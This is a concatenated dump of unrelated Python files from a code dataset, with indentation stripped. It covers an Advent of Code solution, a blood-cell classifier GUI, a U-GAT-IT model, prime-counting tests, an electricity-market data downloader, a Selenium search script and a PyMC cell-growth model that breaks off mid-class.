# Using "taxicab geometry" (grid): https://en.wikipedia.org/wiki/Taxicab_geometry
# Reddit hints for day 3: https://www.reddit.com/r/adventofcode/comments/e5bz2w/2019_day_3_solutions/
# Walkthrough (in php) is here for thought process: https://hwright.com/advent-of-code-hints-2019
# test 1
# wire 1: R8,U5,L5,D3
# wire 2: U7,R6,D4,L4
# distance from crossing to start: 3 + 3 = 6
# steps: 30
# test 2
# R75,D30,R83,U83,L12,D49,R71,U7,L72
# U62,R66,U55,R34,D71,R55,D58,R83
# distance: 159
# steps: 610
# test 3
# R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51
# U98,R91,D20,R16,D67,R40,U7,R15,U6,R7
# distance: 135
# steps: 410
import sys
def calc_step_points(path):
# set everything to 0
curx = cury = step = 0
#give direction dict
directions = {'R': (1,0), 'L': (-1,0), 'U':(0,1), 'D': (0,-1)}
points = {}
for segment in path:
# segment is individual direction (R8 or D3, etc)
# look at segment char 0 and look up the direction in 'directions' dict
# this uses a dict to connect the given letter (U) to the action ((0,1). Neat)
dx, dy = directions[segment[0]]
for _ in range(int(segment[1:])):
# depending on whether the dict looks up an action using the x (L,R) or y (U,D) axis
# use either dx or dy and assign to correct 'cur' variable
curx += dx
cury += dy
# use steps to track the number of steps the wire takes
step += 1
if (curx, cury) not in points:
points[(curx, cury)] = step
return points
wire1_path, wire2_path = open('wire-grid.txt').read().split()
wire1_path, wire2_path = wire1_path.split(','), wire2_path.split(',')
wire1_points = calc_step_points(wire1_path)
wire2_points = calc_step_points(wire2_path)
intersection_points = [point for point in wire1_points if point in wire2_points]
#print(wire1_points, wire2_points)
#print(intersection_points)
part1 = min(abs(x) + abs(y) for (x, y) in intersection_points)
print("Part 1 answer is:", part1)
part2 = min(wire1_points[point] + wire2_points[point] for point in intersection_points)
print("Part 2 answer is", part2) | true |
fb1d752668c79008646b64563f84bf6cdb8e8eb6 | Python | amithreddytadwai/Image-Classification-of-Abnormal-Red-Blood-Cells-Using-Decision-Tree-Algorithm | /final.py | UTF-8 | 7,675 | 2.71875 | 3 | [] | no_license | import tkinter
from tkinter import messagebox
from tkinter import simpledialog
from tkinter import filedialog
from tkinter.filedialog import askopenfilename
from tkinter import *
import numpy as np
import pandas as pd
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
from sklearn.model_selection import train_test_split,KFold,cross_val_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, BaggingClassifier, AdaBoostClassifier
import matplotlib.pyplot as plt
from sklearn.preprocessing import scale
import cv2
import mahotas as mt
import warnings
warnings.filterwarnings('ignore')
main = tkinter.Tk()
main.title("Blood Cell classification")
main.geometry("1300x1200")
class test:
def upload():
global filename
text.delete('1.0', END)
filename = askopenfilename(initialdir = "Dataset")
pathlabel.config(text=filename)
text.insert(END,"Dataset loaded\n\n")
def csv():
global data
text.delete('1.0', END)
data=pd.read_csv(filename)
text.insert(END,"Top Five rows of dataset\n"+str(data.head())+"\n")
text.insert(END,"Last Five rows of dataset\n"+str(data.tail()))
data.drop('Unnamed: 0',axis=1,inplace=True)
def splitdataset():
text.delete('1.0', END)
#print(data.columns)
X = data.iloc[:,:-1]
Y = data.iloc[:,-1]
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2, random_state = 15)
text.insert(END,"\nTrain & Test Model Generated\n\n")
text.insert(END,"Total Dataset Size : "+str(len(data))+"\n")
text.insert(END,"Split Training Size : "+str(len(X_train))+"\n")
text.insert(END,"Split Test Size : "+str(len(X_test))+"\n")
return X_train, X_test, y_train, y_test
def MLmodels():
global model_final
X_train, X_test, y_train, y_test=test.splitdataset()
text.delete('1.0', END)
models=[]
models.append(('RandomForest',RandomForestClassifier()))
models.append(('DecisionTree',DecisionTreeClassifier()))
models.append(('Adaboost',AdaBoostClassifier()))
models.append(('Bagging',BaggingClassifier()))
results=[]
names=[]
predicted_values=[]
text.insert(END,"Machine Learning Classification Models\n")
text.insert(END,"Predicted values,Accuracy Scores and S.D values from ML Classifiers\n\n")
for name,model in models:
kfold=KFold(n_splits=10,random_state=7)
cv_results=cross_val_score(model,X_train,y_train,cv=kfold,scoring='accuracy')
model.fit(X_train,y_train)
predicted=model.predict(X_test)
predicted_values.append(predicted)
results.append(cv_results.mean()*100)
names.append(name)
text.insert(END,"\n"+str(name)+" "+"Predicted Values on Test Data:"+str(predicted)+"\n\n")
text.insert(END, "%s: %f\t\t(%f)\n" %(name,cv_results.mean()*100,cv_results.std()))
if name == 'Bagging':
model_final=model
return results
def graph():
results=test.MLmodels()
bars = ('RandomForest','DecisionTree','Adaboost','Bagging')
y_pos = np.arange(len(bars))
plt.bar(y_pos, results)
plt.xticks(y_pos, bars)
plt.show()
def singleImage():
global testfile
main_img = cv2.imread(testfile)
#Preprocessing
img = cv2.cvtColor(main_img, cv2.COLOR_BGR2RGB)
gs = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
blur = cv2.GaussianBlur(gs, (25,25),0)
ret_otsu,im_bw_otsu = cv2.threshold(blur,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
kernel = np.ones((50,50),np.uint8)
closing = cv2.morphologyEx(im_bw_otsu, cv2.MORPH_CLOSE, kernel)
#Shape features
contours, image = cv2.findContours(closing,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[0]
M = cv2.moments(cnt)
area = cv2.contourArea(cnt)
perimeter = cv2.arcLength(cnt,True)
x,y,w,h = cv2.boundingRect(cnt)
aspect_ratio = float(w)/h
rectangularity = w*h/area
circularity = ((perimeter)**2)/area
#Color features
red_channel = img[:,:,0]
green_channel = img[:,:,1]
blue_channel = img[:,:,2]
blue_channel[blue_channel == 255] = 0
green_channel[green_channel == 255] = 0
red_channel[red_channel == 255] = 0
red_mean = np.mean(red_channel)
green_mean = np.mean(green_channel)
blue_mean = np.mean(blue_channel)
red_std = np.std(red_channel)
green_std = np.std(green_channel)
blue_std = np.std(blue_channel)
#Texture features
textures = mt.features.haralick(gs)
ht_mean = textures.mean(axis=0)
contrast = ht_mean[1]
correlation = ht_mean[2]
inverse_diff_moments = ht_mean[4]
entropy = ht_mean[8]
vector = [area,perimeter,w,h,aspect_ratio,rectangularity,circularity, red_mean,green_mean,blue_mean,red_std,green_std,blue_std,
contrast,correlation,inverse_diff_moments,entropy]
return vector
def pred():
global model_final
global testfile
text.delete('1.0', END)
testfile = askopenfilename(initialdir = "Dataset")
text.insert(END,"Predict File Selected\n\n")
vector = test.singleImage()
test_data = pd.DataFrame([vector])
pred=model_final.predict(test_data)
classess=['Lymphocyte','Monocyte','Neutrophil','Eosinophil']
print(pred)
text.insert(END,"For Image "+str(filename)+" Predicted Output is "+str(classess[pred[0]-1])+"\n")
font = ('times', 16, 'bold')
title = Label(main, text='Image Classification of Abnormal Red Blood Cells Using Decision Tree Algorithm')
title.config(bg='sky blue', fg='black')
title.config(font=font)
title.config(height=3, width=120)
title.place(x=0,y=5)
font1 = ('times', 14, 'bold')
upload = Button(main, text="Upload Dataset", command=test.upload)
upload.place(x=700,y=100)
upload.config(font=font1)
pathlabel = Label(main)
pathlabel.config(bg='royal blue', fg='white')
pathlabel.config(font=font1)
pathlabel.place(x=700,y=150)
df = Button(main, text="Reading Data ", command=test.csv)
df.place(x=700,y=200)
df.config(font=font1)
split = Button(main, text="Train_Test_Split ", command=test.splitdataset)
split.place(x=700,y=250)
split.config(font=font1)
ml= Button(main, text="All Classifiers", command=test.MLmodels)
ml.place(x=700,y=300)
ml.config(font=font1)
graph= Button(main, text="Model Comparison", command=test.graph)
graph.place(x=700,y=350)
graph.config(font=font1)
pre= Button(main, text="Predict", command=test.pred)
pre.place(x=700,y=400)
pre.config(font=font1)
font1 = ('times', 12, 'bold')
text=Text(main,height=30,width=80)
scroll=Scrollbar(text)
text.configure(yscrollcommand=scroll.set)
text.place(x=10,y=100)
text.config(font=font1)
main.config(bg='powder blue')
main.mainloop()
| true |
54dc1f2709f7fa41f1bd9f9ba46da62ad0a8f9b3 | Python | Thatsgaurav/niet-Python-Lab | /Problem Solving using Python Lab. Index/50.largest_of_three_numbers.py | UTF-8 | 468 | 4.4375 | 4 | [] | no_license | # WAP to find the largest of three numbers using user defined function
def find_largest(): #function definition
if(num1>=num2) and (num1>=num2):
largest=num1
elif(num2>=num1) and (num2>=num3):
largest=num2
else:
largest=num3
print("Largest number is",largest)
num1 = int(input("Enter the first number: "))
num2 = int(input("Enter the second number: "))
num3 = int(input("Enter the Third number: "))
find_largest() | true |
58e604bbfb35444bf497e9845077a1565bed8147 | Python | tom99763/U-GAT-IT-implement | /model.py | UTF-8 | 10,675 | 2.515625 | 3 | [] | no_license | import torch
import torch.nn as nn
import torch.nn.functional as F
class ResBlock(nn.Module):
def __init__(self,channels):
super().__init__()
self.conv=nn.Sequential(
nn.ReflectionPad2d(1),
nn.Conv2d(in_channels=channels, out_channels=channels,
kernel_size=(3, 3), stride=(1, 1),bias=False),
nn.InstanceNorm2d(num_features=channels),
nn.ReLU(inplace=True),
nn.ReflectionPad2d(1),
nn.Conv2d(in_channels=channels, out_channels=channels,
kernel_size=(3, 3), stride=(1, 1),bias=False),
nn.InstanceNorm2d(num_features=channels),
)
def forward(self,x):
return x+self.conv(x)
class Adapolin_Stack(nn.Module):
def __init__(self,channels):
super().__init__()
self.act=nn.ReLU(inplace=True)
self.conv1=nn.Sequential(
nn.ReflectionPad2d(1),
nn.Conv2d(in_channels=channels, out_channels=channels,
kernel_size=(3, 3), stride=(1, 1),bias=False),
)
self.conv2=nn.Sequential(
nn.ReflectionPad2d(1),
nn.Conv2d(in_channels=channels, out_channels=channels,
kernel_size=(3, 3), stride=(1, 1),bias=False)
)
self.adapolin1=AdaLIN(channels=channels,eat=True)
self.adapolin2=AdaLIN(channels=channels,eat=True)
def forward(self,x,gamma=None,beta=None):
o=self.conv1(x)
o=self.adapolin1(o,gamma,beta)
o=self.act(o)
o=self.conv2(o)
o=self.adapolin2(o,gamma,beta)
return o+x
class AdaLIN(nn.Module):
def __init__(self,channels,eat=False):
super().__init__()
self.eat=eat
self.In=nn.InstanceNorm2d(num_features=channels)
self.rho = nn.Parameter(data=torch.Tensor(1, channels, 1, 1))
if not self.eat:
self.gamma=nn.Parameter(data=torch.Tensor(1,channels,1,1))
self.beta = nn.Parameter(data=torch.Tensor(1, channels, 1, 1))
self.gamma.data.fill_(1.0)
self.beta.data.fill_(0.0)
self.rho.data.fill_(0.0)
else:
self.rho.data.fill_(0.9)
def forward(self,x,gamma=None,beta=None):
In=self.In(x)
Ln=(x-torch.mean(x,dim=[1,2,3],keepdim=True))/(torch.sqrt(torch.var(x,dim=[1,2,3],keepdim=True))+1e-5)
x=self.rho*In+(1-self.rho)*Ln
if self.eat:
x=gamma*x+beta
else:
x=self.gamma*x+self.beta
return x
'''
x=torch.randn(1,256,32,32)
gamma=torch.randn(1,256,1,1)
beta=torch.randn(1,256,1,1)
ada=Adapolin_Stack(256)
res=ResBlock(256)
print(ada(x,gamma,beta).shape)
print(res(x).shape)
'''
class Generator(nn.Module):
def __init__(self,base=64,n_res=4,downsample=2):
super().__init__()
self.downsample=downsample
self.base=base
self.n_res=n_res
self.down=[]
self.up=[]
self.down+=[nn.ReflectionPad2d(3),
nn.Conv2d(in_channels=3,out_channels=self.base,
kernel_size=(7,7),
stride=(1,1),
bias=False),
nn.InstanceNorm2d(self.base),
nn.ReLU(inplace=True)
]
for i in range(self.downsample):
self.scale=2**(i)
self.down+=[nn.ReflectionPad2d(1),
nn.Conv2d(in_channels=self.base*self.scale,out_channels=self.base*self.scale*2,
kernel_size=(3,3),
stride=(2,2),
bias=False),
nn.InstanceNorm2d(self.base*2),
nn.ReLU(inplace=True)
]
self.res=[ResBlock(self.base*self.scale*2) for _ in range(self.n_res)]
self.gmp_fc=nn.Linear(in_features=self.base*self.scale*2,
out_features=1,bias=False)
self.gap_fc = nn.Linear(in_features=self.base * self.scale * 2,
out_features=1, bias=False)
self.conv11=nn.Conv2d(in_channels=self.base*self.scale*4,
out_channels=self.base*self.scale*2,
kernel_size=(1,1),
stride=(1,1))
self.act=nn.ReLU(inplace=True)
self.mlp=[nn.Linear(in_features=self.base*self.scale*2,
out_features=self.base*self.scale*2,bias=False),
nn.ReLU(inplace=True),
nn.Linear(in_features=self.base * self.scale * 2,
out_features=self.base * self.scale * 2, bias=False),
nn.ReLU(inplace=True)
]
self.gamma=nn.Linear(in_features=self.base * self.scale * 2,
out_features=self.base * self.scale * 2, bias=False)
self.beta = nn.Linear(in_features=self.base * self.scale * 2,
out_features=self.base * self.scale * 2, bias=False)
for i in range(self.n_res):
setattr(self,f'adapolin_{i}',Adapolin_Stack(self.base*self.scale*2))
for i in range(self.downsample):
self.scale=2**(self.downsample-i-1)
self.up+=[
nn.Upsample(scale_factor=2),
nn.ReflectionPad2d(1),
nn.Conv2d(in_channels=self.base*self.scale*2,
out_channels=self.base*self.scale,
kernel_size=(3,3),
stride=(1,1),
bias=False),
AdaLIN(channels=self.base*self.scale),
nn.ReLU(inplace=True)
]
self.up+=[nn.ReflectionPad2d(3),
nn.Conv2d(in_channels=self.base,
out_channels=3,
kernel_size=(7, 7),
stride=(1, 1),
bias=False),
nn.Tanh()]
self.down=nn.Sequential(*self.down)
self.up=nn.Sequential(*self.up)
self.res=nn.Sequential(*self.res)
self.mlp=nn.Sequential(*self.mlp)
def forward(self,x):
x=self.down(x)
x=self.res(x)
gap,gap_logit=self.class_activation_map(x,
pool_fn=F.adaptive_avg_pool2d,
map_fn=self.gap_fc)
gmp,gmp_logit=self.class_activation_map(x,
pool_fn=F.adaptive_max_pool2d,
map_fn=self.gmp_fc)
x=torch.cat([gap,gmp],dim=1)
x=self.act(self.conv11(x))
logit=torch.cat([gap_logit,gmp_logit],dim=1)
heatmap=torch.sum(x,dim=1)
xp=F.adaptive_avg_pool2d(x,1)
xp=self.mlp(xp.view(xp.shape[0],-1))
gamma=self.gamma(xp).unsqueeze(2).unsqueeze(3)
beta=self.beta(xp).unsqueeze(2).unsqueeze(3)
for i in range(self.n_res):
x=getattr(self,f'adapolin_{i}')(x,gamma=gamma,beta=beta)
x=self.up(x)
return x,logit,heatmap
def class_activation_map(self,x,pool_fn,map_fn):
pooled=pool_fn(x,1)
logit=map_fn(pooled.view(pooled.shape[0],-1))
weights=list(map_fn.parameters())[0]
o=x*weights.unsqueeze(2).unsqueeze(3)
return o,logit
class Discriminator(nn.Module):
def __init__(self,base=64,downsample=3):
super().__init__()
self.downsample=downsample
self.base=base
self.down=[]
self.down+=[
nn.ReflectionPad2d(1),
nn.utils.spectral_norm(nn.Conv2d(
in_channels=3,
out_channels=self.base,
kernel_size=(4,4),
stride=(2,2), )),
nn.LeakyReLU(0.2,inplace=True) ]
for i in range(self.downsample):
self.scale=2**(i)
self.down += [
nn.ReflectionPad2d(1),
nn.utils.spectral_norm(nn.Conv2d(
in_channels=self.base*self.scale,
out_channels=self.base*self.scale*2,
kernel_size=(4, 4),
stride=(2, 2) if i!=self.downsample-1 else (1,1))),
nn.LeakyReLU(0.2, inplace=True)]
self.gmp_fc=nn.utils.spectral_norm(nn.Linear(in_features=self.base*self.scale*2,
out_features=1,bias=False))
self.gap_fc =nn.utils.spectral_norm(nn.Linear(in_features=self.base * self.scale * 2,
out_features=1, bias=False))
self.conv11=nn.Conv2d(in_channels=self.base*self.scale*4,
out_channels=self.base*self.scale*2,
kernel_size=(1,1),
stride=(1,1))
self.act=nn.LeakyReLU(0.2,inplace=True)
self.out_map=nn.Sequential(
nn.ReflectionPad2d(1),
nn.utils.spectral_norm(nn.Conv2d(
in_channels=self.base*self.scale*2,
out_channels=1,
kernel_size=(4, 4),
stride=(1, 1))),
nn.Tanh()
)
self.down=nn.Sequential(*self.down)
def forward(self,x):
x=self.down(x)
gap,gap_logit=self.class_activation_map(x,
pool_fn=F.adaptive_avg_pool2d,
map_fn=self.gap_fc)
gmp,gmp_logit=self.class_activation_map(x,
pool_fn=F.adaptive_max_pool2d,
map_fn=self.gmp_fc)
x=torch.cat([gap,gmp],dim=1)
x=self.act(self.conv11(x))
logit=torch.cat([gap_logit,gmp_logit],dim=1)
heatmap=torch.sum(x,dim=1)
x=self.out_map(x)
return x,logit,heatmap
def class_activation_map(self,x,pool_fn,map_fn):
pooled=pool_fn(x,1)
logit=map_fn(pooled.view(pooled.shape[0],-1))
weights=list(map_fn.parameters())[0]
o=x*weights.unsqueeze(2).unsqueeze(3)
return o,logit
'''
G=Generator()
D_L=Discriminator(base=64)
D_G=Discriminator(downsample=5)
x=torch.randn(1,3,128,128)
x,logit,heatmap=G(x)
dg,logitdg,hdg=D_G(x)
dl,logitdl,hdl=D_L(x)
print(dg.shape)
print(logitdg.shape)
print(hdg.shape)
print(dl.shape)
print(logitdl.shape)
print(hdl.shape)
print(x.shape)
print(logit.shape)
print(heatmap.shape)
'''
| true |
3eda0cf33e5df0f6203f00e0722414db838b749c | Python | Madrant/leetcode | /python/204.Count-primes/test.py | UTF-8 | 2,363 | 3.09375 | 3 | [] | no_license | #!/usr/bin/python3
import unittest
from run import NaiveSolution, FastSolution, FastestSolution
class SolutionTest(unittest.TestCase):
def setUp(self):
self.solution = None
def test_2_countPrimes(self):
if not self.solution:
return
self.assertEqual(self.solution.countPrimes(0), 0)
self.assertEqual(self.solution.countPrimes(1), 0)
self.assertEqual(self.solution.countPrimes(2), 0)
self.assertEqual(self.solution.countPrimes(3), 1)
self.assertEqual(self.solution.countPrimes(4), 2)
self.assertEqual(self.solution.countPrimes(5), 2)
self.assertEqual(self.solution.countPrimes(6), 3)
self.assertEqual(self.solution.countPrimes(7), 3)
self.assertEqual(self.solution.countPrimes(8), 4)
self.assertEqual(self.solution.countPrimes(9), 4)
self.assertEqual(self.solution.countPrimes(10), 4)
# There are 500 prime numbers before 3572
self.assertEqual(self.solution.countPrimes(3572), 500)
class NaiveSolutionTest(SolutionTest):
def setUp(self):
self.solution = NaiveSolution()
def test_1_isPrime(self):
return
# 0 and 1 is not a prime numbers
self.assertFalse(self.solution.isPrime(0))
self.assertFalse(self.solution.isPrime(1))
self.assertTrue(self.solution.isPrime(2))
self.assertTrue(self.solution.isPrime(3))
self.assertTrue(self.solution.isPrime(5))
self.assertTrue(self.solution.isPrime(7))
self.assertTrue(self.solution.isPrime(11))
self.assertFalse(self.solution.isPrime(4))
self.assertFalse(self.solution.isPrime(6))
self.assertFalse(self.solution.isPrime(8))
self.assertFalse(self.solution.isPrime(9))
self.assertFalse(self.solution.isPrime(10))
self.assertFalse(self.solution.isPrime(90))
self.assertFalse(self.solution.isPrime(91))
self.assertTrue(self.solution.isPrime(97))
self.assertTrue(self.solution.isPrime(101))
self.assertTrue(self.solution.isPrime(3571))
class NaiveSolutionTest(NaiveSolutionTest):
def setUp(self):
self.solution = FastSolution()
class FastestSolutionTest(SolutionTest):
def setUp(self):
self.solution = FastestSolution()
if __name__ == "__main__":
unittest.main(verbosity = 2)
| true |
82fc3589e63cd6c6586bd609babbbcd9cb405345 | Python | polpol0820/NLP100problems | /ch3/src/23.py | UTF-8 | 519 | 3.265625 | 3 | [] | no_license | #23. セクション構造
import json
import re
"""
reは正規表現
正規表現についてはもっと知る必要がありそう。。。
結構メンドクサイの塊
"""
json_open = open("./../jawiki-country.json","r")
for row in json_open:
row = json.loads(row)
if row["title"] == "イギリス":
txt_uk = row["text"]
break
pattern = r'^(\={2,})\s*(.+?)\s*(\={2,}).*$'
result ='\n'.join(i[1] + ":" + str(len(i[0])-1) for i in re.findall(pattern,txt_uk,re.MULTILINE))
print(result) | true |
564ccf80dc78f575f27cc6d4317e4fa2eb902e90 | Python | ADGEfficiency/nem-data | /nemdata/nemde.py | UTF-8 | 4,108 | 2.609375 | 3 | [] | no_license | import datetime
import pathlib
import typing
import warnings
import numpy as np
import pandas as pd
import pydantic
import requests
from rich import print
from nemdata import utils
from nemdata.config import DEFAULT_BASE_DIRECTORY
from nemdata.constants import constants
class NEMDETable(pydantic.BaseModel):
frequency: int = 5
interval_column: str = "PeriodID"
class NEMDEFile(pydantic.BaseModel):
year: int
month: int
day: int
url: str
xml_name: str
data_directory: pathlib.Path
zipfile_path: pathlib.Path
def make_many_nemde_files(
start: str, end: str, base_directory: pathlib.Path
) -> list[NEMDEFile]:
"""creates many NEMDEFiles - one for each day"""
files = []
months = pd.date_range(start=start, end=end, freq="D")
for year, month, day in zip(months.year, months.month, months.day):
files.append(
make_one_nemde_file(
year=year, month=month, day=day, base_directory=base_directory
)
)
return files
def make_one_nemde_file(
year: int, month: int, day: int, base_directory: pathlib.Path
) -> NEMDEFile:
padded_month = str(month).zfill(2)
padded_day = str(day).zfill(2)
url = f"http://www.nemweb.com.au/Data_Archive/Wholesale_Electricity/NEMDE/{year}/NEMDE_{year}_{padded_month}/NEMDE_Market_Data/NEMDE_Files/NemPriceSetter_{year}{padded_month}{padded_day}_xml.zip"
xml_name = f"NemPriceSetter_{year}{padded_month}{padded_day}.xml"
data_directory = base_directory / "nemde" / f"{year}-{padded_month}-{padded_day}"
data_directory.mkdir(exist_ok=True, parents=True)
return NEMDEFile(
year=year,
month=month,
day=day,
url=url,
xml_name=xml_name,
data_directory=data_directory,
zipfile_path=data_directory / "raw.zip",
)
def find_xmls(path: pathlib.Path) -> list[pd.DataFrame]:
"""find all XML files in a directory"""
fis = [p for p in path.iterdir() if p.suffix == ".xml"]
return [pd.read_xml(f) for f in fis]
def download_nemde(
start: str,
end: str,
table_name: str = "nemde",
base_directory: pathlib.Path = DEFAULT_BASE_DIRECTORY,
dry_run: bool = False,
) -> pd.DataFrame:
"""main for downloading MMSDMFiles"""
table = NEMDETable()
files = make_many_nemde_files(start, end, base_directory)
dataset = []
for file in files:
data = download_one_nemde(table, file, dry_run)
if data is not None:
dataset.append(data)
try:
return pd.concat(dataset, axis=0)
except ValueError:
return pd.DataFrame()
def download_one_nemde(
table: NEMDETable, file: NEMDEFile, dry_run: bool
) -> typing.Union[pd.DataFrame, None]:
clean_fi = file.data_directory / "clean.parquet"
if clean_fi.exists():
print(f" [blue]CACHED[/] {' '.join(clean_fi.parts[-5:])}")
return pd.read_parquet(clean_fi)
else:
print(f" [blue]NOT CACHED[/] {' '.join(clean_fi.parts[-5:])}")
data_available = utils.download_zipfile(file)
if not data_available:
print(f" [red]NOT AVAILABLE[/] {' '.join(file.zipfile_path.parts[-5:])}")
return None
else:
print(f" [green]DOWNLOADING[/] {' '.join(file.zipfile_path.parts[-5:])}")
utils.download_zipfile(file)
utils.unzip(file.zipfile_path)
xmls = find_xmls(file.data_directory)
data = pd.concat(xmls, axis=0)
# get problems with a value of '5' without the cast to float
data["BandNo"] = data["BandNo"].astype(float)
# already timezone aware here
data["PeriodID"] = pd.to_datetime(data["PeriodID"])
assert data["PeriodID"].dt.tz._offset == datetime.timedelta(seconds=3600 * 10)
data["PeriodID"] = data["PeriodID"].dt.tz_convert(constants.nem_tz)
data = utils.add_interval_column(data, table)
if not dry_run:
print(f" [green]SAVING [/] {clean_fi}")
data.to_csv(clean_fi.with_suffix(".csv"))
data.to_parquet(clean_fi.with_suffix(".parquet"))
return data
| true |
413891bda1d7e24a47a95404f3f50fd849d80f94 | Python | kanav-raina/Automation-with-Selenium | /actions_demo.py | UTF-8 | 434 | 2.75 | 3 | [] | no_license | import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver=webdriver.Chrome("/home/kanav/Downloads/automation/chromedriver")
driver.get("https://google.com")
#Locate the search box element
search_box=driver.find_element_by_name("q")
time.sleep(5)
#type in your search query into the search box
search_box.send_keys("seleniumhq"+Keys.RETURN)
time.sleep(10)
print(driver.title)
driver.close()
| true |
f3e151af1fc6f3109cca18fd9fb07d435e2700ca | Python | heman-oliver/chess | /pawn.py | UTF-8 | 2,046 | 3.5 | 4 | [] | no_license | import pygame
from constants import SQUARE_SIZE
from color import Color
class Pawn(object):
def __init__(self, row , col, board) -> None:
self.row = row
self.col = col
self.side = board.chess_board[row][col][0]
self.board = board
def draw_valid_moves(self, screen, valid_moves):
if self.board.chess_board[self.row][self.col][1] == 'p':
for valid_move in valid_moves:
pygame.draw.circle(screen, Color.YELLOW, (valid_move[1]* SQUARE_SIZE + SQUARE_SIZE//2, valid_move[0]* SQUARE_SIZE + SQUARE_SIZE//2), 15)
def get_valid_moves(self):
valid_moves = []
if self.side == "w":
if self.board.chess_board[self.row - 1][self.col] == "--":
valid_moves.append([self.row-1, self.col])
if self.row == 6 and self.board.chess_board[self.row - 2][self.col] == "--":
valid_moves.append([self.row - 2, self.col])
if self.col - 1 >= 0:
if self.board.chess_board[self.row - 1][self.col - 1][0] == 'b':
valid_moves.append([self.row - 1, self.col - 1])
if self.col + 1 <= 7:
if self.board.chess_board[self.row - 1][self.col + 1][0] == 'b':
valid_moves.append([self.row - 1, self.col + 1])
elif self.side == "b":
if self.board.chess_board[self.row + 1][self.col] == "--":
valid_moves.append([self.row+1, self.col])
if self.row == 1 and self.board.chess_board[self.row + 2][self.col] == "--":
valid_moves.append([self.row + 2,self.col])
if self.col - 1 >= 0:
if self.board.chess_board[self.row + 1][self.col - 1][0] == 'w':
valid_moves.append([self.row + 1, self.col - 1])
if self.col + 1 <= 7:
if self.board.chess_board[self.row + 1][self.col + 1][0] == 'w':
valid_moves.append([self.row + 1, self.col + 1])
return valid_moves | true |
11bc1605e648110fca52ee65c4baf85255337c9b | Python | kongtianyi/cabbird | /leetcode/linked_list_cycle_II.py | UTF-8 | 490 | 2.921875 | 3 | [] | no_license | from structure.listnode import *
def detectCycle(head):
fast_p=slow_p=head
while fast_p and fast_p.next and fast_p.next.next:
fast_p=fast_p.next.next
slow_p=slow_p.next
if fast_p == slow_p:
fast_p=head
while slow_p != fast_p:
slow_p=slow_p.next
fast_p=fast_p.next
return slow_p
return None
if __name__=="__main__":
head=listToNode([1,2,4,3,5,6])
print detectCycle(head)
| true |
cef574c4eaeb3c9675d569097ce3b1942f9f427d | Python | meyer-lab/ps-growth-model | /grmodel/pymcGrowth.py | UTF-8 | 8,880 | 2.796875 | 3 | [
"MIT"
] | permissive | """
This module handles experimental data, by fitting a growth and death rate for each condition separately.
"""
from os.path import join, dirname, abspath
import pandas
import numpy as np
import pymc3 as pm
import theano.tensor as T
fitKwargs = {"tune": 3000, "progressbar": False, "target_accept": 0.9}
def theanoCore(timeV, div, deathRate, apopfrac, d):
""" Assemble the core growth model. """
# Make a vector of time and one for time-constant values
timeV = T._shared(timeV)
constV = T.ones_like(timeV) # pylint: disable=no-member
# Calculate the growth rate
GR = T.outer(div - deathRate, constV)
# cGDd is used later
cGRd = T.outer(deathRate * apopfrac, constV) / (GR + d)
# b is the rate straight to death
b = T.outer(deathRate * (1 - apopfrac), constV)
lnum = T.exp(GR * timeV)
# Number of early apoptosis cells at start is 0.0
eap = cGRd * (lnum - T.exp(-d * timeV))
# Calculate dead cells via apoptosis and via necrosis
deadnec = b * (lnum - 1) / GR
deadapop = d * cGRd * (lnum - 1) / GR + cGRd * (T.exp(-d * timeV) - 1)
return (lnum, eap, deadapop, deadnec)
def convSignal(lnum, eap, deadapop, deadnec, conversions):
""" Sums up the cell populations to link number of cells to image area. """
conv, offset = conversions
confl_exp = (lnum + eap + deadapop + deadnec) * conv[0]
apop_exp = (eap + deadapop) * conv[1] + offset[0]
dna_exp = (deadapop + deadnec) * conv[2] + offset[1]
return (confl_exp, apop_exp, dna_exp)
def conversionPriors(conv0):
""" Sets the various fluorescence conversion priors. """
# Set up conversion rates
confl_conv = pm.Lognormal("confl_conv", np.log(conv0), 0.1)
apop_conv = pm.Lognormal("apop_conv", np.log(conv0) - 2.06, 0.1)
dna_conv = pm.Lognormal("dna_conv", np.log(conv0) - 1.85, 0.1)
# Priors on conv factors
pm.Lognormal("confl_apop", -2.06, 0.0647, observed=apop_conv / confl_conv)
pm.Lognormal("confl_dna", -1.85, 0.125, observed=dna_conv / confl_conv)
pm.Lognormal("apop_dna", 0.222, 0.141, observed=dna_conv / apop_conv)
# Offset values for apop and dna
apop_offset = pm.Lognormal("apop_offset", np.log(0.1), 0.1)
dna_offset = pm.Lognormal("dna_offset", np.log(0.1), 0.1)
return ((confl_conv, apop_conv, dna_conv), (apop_offset, dna_offset))
def deathPriors(numApop):
""" Setup priors for cell death parameters. """
# Rate of moving from apoptosis to death, assumed invariant wrt. treatment
d = pm.Lognormal("d", np.log(0.01), 0.5)
# Fraction of dying cells that go through apoptosis
apopfrac = pm.Beta("apopfrac", 1.0, 1.0, shape=numApop)
return d, apopfrac
def build_model(conv0, doses, timeV, expTable):
""" Builds then returns the pyMC model. """
growth_model = pm.Model()
with growth_model:
conversions = conversionPriors(conv0)
d, apopfrac = deathPriors(len(doses))
# Specify vectors of prior distributions
# Growth rate
div = pm.Uniform("div", lower=0.0, upper=0.035, shape=len(doses))
# Rate of entering apoptosis or skipping straight to death
deathRate = pm.Lognormal("deathRate", np.log(0.001), 0.5, shape=len(doses))
lnum, eap, deadapop, deadnec = theanoCore(timeV, div, deathRate, apopfrac, d)
# Convert model calculations to experimental measurement units
confl_exp, apop_exp, dna_exp = convSignal(lnum, eap, deadapop, deadnec, conversions)
# Observed error values for confl
confl_obs = T.reshape(confl_exp, (-1,)) - expTable["confl"]
pm.Normal("dataFit", sd=T.std(confl_obs), observed=confl_obs)
# Observed error values for apop
apop_obs = T.reshape(apop_exp, (-1,)) - expTable["apop"]
pm.Normal("dataFita", sd=T.std(apop_obs), observed=apop_obs)
# Observed error values for dna
dna_obs = T.reshape(dna_exp, (-1,)) - expTable["dna"]
pm.Normal("dataFitd", sd=T.std(dna_obs), observed=dna_obs)
return growth_model
class GrowthModel:
""" Model for fitting data incorporating cell death response. """
def performFit(self):
""" Run NUTS sampling"""
